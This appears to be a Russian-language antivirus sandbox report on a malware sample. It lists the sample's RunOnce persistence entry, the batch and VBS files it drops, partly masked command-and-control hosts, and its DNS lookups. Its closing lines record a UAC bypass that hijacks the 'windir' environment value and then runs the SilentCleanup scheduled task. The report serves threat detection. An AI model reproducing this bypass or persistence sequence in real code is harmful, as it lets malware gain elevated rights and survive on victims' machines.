Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce] 'Ijtl' = '%LOCALAPPDATA%\Ijtl\Ijtl.hta'
- <SYSTEM32>\tapiunattend.exe
- %LOCALAPPDATA%\ijtl\ijtlest.exe
- %LOCALAPPDATA%\ijtl\ijtl.hta
- C:\users\public\cde.bat
- C:\users\public\x.bat
- C:\users\public\x.vbs
- C:\users\public\natso.bat
- C:\users\public\x.bat
- C:\users\public\natso.bat
- C:\users\public\cde.bat
- C:\users\public\x.vbs
- 'ka###goussd.ug':6969
- 'drive.google.com':443
- 'do#########ocs.googleusercontent.com':443
- DNS ASK microsoft.com
- DNS ASK drive.google.com
- DNS ASK do#########ocs.googleusercontent.com
- DNS ASK ka###goussd.ug
- DNS ASK fg####sdfsdxcbv.ru
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Natso.bat' (со скрытым окном)
- '<SYSTEM32>\tapiunattend.exe'
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Natso.bat
- '<SYSTEM32>\reg.exe' delete hkcu\Environment /v windir /f
- '<SYSTEM32>\reg.exe' add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
- '<SYSTEM32>\schtasks.exe' /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I